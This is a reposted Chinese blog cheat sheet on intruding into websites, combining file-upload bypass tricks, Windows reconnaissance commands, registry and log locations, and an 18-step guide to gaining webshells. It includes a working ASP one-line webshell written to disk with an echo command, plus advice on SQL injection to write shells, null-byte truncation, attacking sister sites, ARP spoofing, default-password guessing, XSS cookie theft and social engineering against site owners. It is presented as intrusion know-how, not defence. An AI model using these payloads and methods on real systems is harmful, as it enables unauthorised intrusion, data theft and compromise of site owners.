• WEB下渗透测试经验技巧(全)[转载]


    Nuclear’Atk 整理的:

    上传漏洞拿shell:

    1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx….之类的马,拿到shell.
    2.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:*.asp ,*.asp..。
    3.利用双重扩展名上传例如:*.jpg.asa格式(也可以配上第二点一起利用)。
    4.gif文件头欺骗
    5.同名重复上传也很OK。:

    入侵渗透中用到的命令,语法:

    set,systeminfo,ipconfig,ping,利用这些命令可以收到比较多的系统信息
    tasklist /svc   查看 服务对应的pid
    netstat -ano,netstat -abnv
    fsutil.exe fsinfo drives  列出全部盘符
    dir d:*conn*.* /s     找数据库连接文件
    telnet 218.25.88.234 3389    对外部是否开放了这个端口
    echo  ^<%execute(request(“cmd”))%^> >>e:kX.asp   写一句话到e:k目录,密码为cmd.
    type d:wwwrootwebk6.asp >d:wwwroot123a.asp   传送d:wwwrootweb下的k6.asp到d:wwwroot123重命名为a.asp

    注册表敏感信息:

    HKEY_LOCAL_MACHINESOFTWAREMySQL AB    mysql 注册表位置
    HKEY_LOCAL_MACHINESOFTWAREHZHOSTCONFIG   华众主机位置
    HKEY_LOCAL_MACHINESOFTWAREcat softserv-u    serv-u 位置
    HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds dpwdTds cpPortNamber 3389端口
    HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpipParameters    1433端口
    HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesMSFtpsvcParametersVirtual Roots  服务器ftp路径

    服务器日志文件物理路径:

    安全日志文件:%systemroot%system32config SecEvent.EVT
    系统日志文件:%systemroot%system32config SysEvent.EVT
    应用程序日志文件:%systemroot%system32config AppEvent.EVT
    FTP连接日志和HTTPD事务日志:systemroot% system32LogFiles,下面还有子文件夹,分别对应该FTP和Web服务的日志,其对应的后缀名为.Log。
    诺顿杀毒日志:C:Documents and SettingsAll UsersApplication DataSymantec

    oldjun 大牛写的入侵网站的经验:

    下面谈谈个人入侵的经验,不分语言,只谈拿webshell,至于提权,这里不说,我也很少提权,除非确实有必要!~

    1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多!

    2.asp(aspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,那就猜数据,从后台下手了,后台可以上传或者改配置文件;

    3.asp(aspx)+ACCESS拿shell一般只有3种方法,一是前台上传或者注入进后台上传;二是注入进后台改配置文件;三是注入进后台备份数据库或者暴库后知道是asp或者asa数据库于是直接写一句话;

    4.php+MYSQL一般是注入进后台上传,偶尔运气好些权限够高可以注入select into outfile;然后包含,分本地与远程,远程包含在高版本php是不支持的,于是想办法本地上传图片文件或者写到log里;然后php程序某某未公开的 漏洞,运气好可以直接写shell。

    5.jsp+MYSQL利用数据库拿权限方面基本同php,而且jsp的上传基本很少检查文件后缀,于是只要有注入点与后台,拿shell相当的容易。jsp+ORACLE的站我碰到的不多,碰到的也是猜出用户名与密码从后台下手的。

    6.无论什么大站,主站一般都很安全(不然早被人玩了),于是一般从二级域名下手,猜出主站的某些用户名与密码或者搞到主站的源代码,或者旁注得到同网段服务器后cain或arp。

    7.一般的大站很少有用现成的CMS的,于是如果你有幸找到源码,那你就发了,注入漏洞啊,上传漏洞啊,写文件漏洞啊,都掌握在你手里。多看看那些大站新出来的测试分站点,那些站还在测试中,可以很轻松拿下。

    8.上传有个文件名截断,这包括2个方面,一是00截断,二是长文件名截断(曾经利用这个搞下hw);然后很多写文件的地方,都可以00,屡试不爽。上传别忘了.asp(当然.asa,.cer,.cdx都可以啦)目录的妙用。

    9.php站无论windows还是linux,都有magic_quotes_gpc的问题,magic_quotes_gpc为on的时候,在 server变量注入的时候还是可以select into outfile,今年我搞过某未开源cms就是这个情况,一般情况下为on就别考虑写文件了,不过有这个权限别忘了读文件源码,因为load_file的 参数是可以编码的。

    10.猜路径或者文件在入侵中非常必要,猜不到路径的时候别忘了google(baidu太烂,google很全),于是你可以考虑看站点下的robot.txt或者robots.txt,会有惊喜。

    11.工具的使用很重要,入侵之前用WVS扫扫会有助入侵;注入工具虽然很多,但不见得都好使,现在的软硬防火墙、防注入越来越厉害,那时候你就别偷懒,多手工有助你成长。

    12.遇到过一流监控么,遇到其他防post的防火墙么,有时候一句话进去了都无法传大马,那时候,你先学学编码,学学变换绕过。

    13.想搞一般的小站,记得查看这个小站的版权,找做这个站的公司,然后从这个公司做的其他站下手,得到源码再回头搞,我曾经通过这个方法拿下某知名制药的公司站。

    14.旁注的思路永远不过时,遇到dbowner的注入,可以很舒服写shell到你需要的站,省得麻烦的提权了;运气不好,按部就班拿shell提权得到你所需。

    15.永远别忘记社会工程学,利用社工把自己当成一个什么也不会的人,从某某站长的qq,身份证,邮箱等等下手,也许有时可能会有意外;另外别忘记admin,admin;test,test;123456,123456这种简单的尝试,当然,你也可以暴力破解。

    16.别忽视XSS,别忽视cookie,XSS可以偷cookie,更有若干妙用,自己学会领悟;cookie可以伪造登陆,cookie可以注入,cookie注入可以绕绝大多数的防火墙。

    17.平时搞站多多搜集路径啊,源码啊,工具啊,充实自己的“武器”库;最好把自己的入侵步骤记录下来,或者事后反思下,我一般都是记在txt里,另外要做到举一反三。

    18.多学习,多看源码,多看公布出来的0day,脚本是入侵的前提,而不是工具,会用工具会装B你还没入门。

  • 相关阅读:
    十天学会php之第一天
    学习PHP的一些经验
    PHP中的数据类型(1)
    PHP中的常量
    赵凡导师并发知识第一次分享观后感
    面向对象之 __setitem__()、__getitem__()、__delitem__() 用法
    spider数据抓取(第二章)
    识别网站所用技术
    scrapy安装要求
    基于bs4的防止xss攻击,过滤script标签
  • 原文地址:https://www.cnblogs.com/sybboy/p/5051879.html
Copyright © 2020-2023  润新知